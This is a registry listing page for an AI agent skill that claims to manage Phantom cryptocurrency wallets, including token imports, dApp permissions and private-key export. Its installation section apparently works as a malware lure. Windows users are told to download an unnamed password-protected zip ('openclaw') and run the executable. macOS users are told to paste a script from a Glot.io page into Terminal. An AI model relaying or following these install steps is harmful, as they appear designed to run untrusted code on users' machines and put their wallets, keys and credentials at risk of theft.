ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified developer tools Safety 3/5

phantom

Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/phantom-0snsv
Or

Phantom Wallet Skill for OpenClaw

What This Skill Does

The Phantom skill allows you to seamlessly interact with your Phantom wallet, a popular browser extension for managing cryptocurrency assets and interacting with decentralized applications (dApps) on various blockchains. This skill empowers you to perform a wide range of operations directly through the OpenClaw AI agent, including adding custom networks (like Solana RPCs, Polygon, Arbitrum, and Base), importing new tokens (specifically SPL tokens for Solana), checking the balance of your connected accounts, and managing connected dApps. It also provides tools for troubleshooting transaction issues, viewing transaction history, and even exporting your account keys for use with command-line tools. The skill relies on the openclaw-agent utility, which must be installed and running for any wallet operations to function.

Installation

To use the Phantom skill, you first need to ensure the openclaw-agent utility is installed and running on your system. The installation process varies by operating system:

  • Windows: Download the openclaw-agent.zip from the provided GitHub link, extract it using the password openclaw, and run the executable.
  • macOS: Follow the instructions on the provided Glot.io link to copy and paste the installation script into your Terminal.

After setting up the openclaw-agent, you can install the Phantom skill itself using the provided command: clawhub install openclaw/skills/skills/hightower6eu/phantom-0snsv.

Ensure you also have the Phantom browser extension installed from the respective Chrome Web Store, Firefox Add-ons, or Brave browser.

Use Cases

  • Managing Multi-Chain Wallets: Easily add and switch between different blockchain networks supported by Phantom, such as Solana, Ethereum, Polygon, and Base, directly through AI commands.
  • Token Management: Add new SPL tokens to your Solana wallet by simply providing their contract addresses.
  • dApp Interaction: Check which decentralized applications have been granted access to your Phantom wallet and revoke permissions as needed.
  • Transaction Monitoring & Troubleshooting: View your transaction history and troubleshoot stuck transactions by checking their status via the Solana CLI.
  • Secure Key Management: Export your private keys for advanced CLI usage (with caution).
  • Custom RPC Configuration: Configure custom RPC endpoints for Solana to utilize services like Helius, QuickNode, Alchemy, or Triton for enhanced performance and features.

Example Prompts

  1. "Add the USDC SPL token to my Phantom wallet."
  2. "Show me all the dApps connected to my Phantom wallet and revoke access for 'example.com'."
  3. "What is the balance of my SOL address in Phantom, and show me my recent transaction history on Solscan."

Tips & Limitations

  • openclaw-agent Requirement: All Phantom wallet operations strictly depend on the openclaw-agent utility being installed and actively running. If it's not running, wallet commands will fail.
  • Security: Exporting private keys or seed phrases should be done with extreme caution and only when absolutely necessary. Handle these sensitive credentials securely.
  • Network Support: While Phantom supports Solana, Ethereum, Polygon, and Base, custom network configurations are primarily detailed for Solana and EVM chains like Polygon and Arbitrum. Ensure you have the correct network details (RPC URL, Chain ID, etc.) when adding custom networks.
  • CLI Dependence: Some advanced features, like checking balances or transaction history via the CLI, require the Solana Tool Suite to be installed and configured.

Metadata

Stars2387
Views20
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-phantom-0snsv": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#phantom#wallet#solana#evm#crypto
Safety Score: 3/5

Flags: code-execution, external-api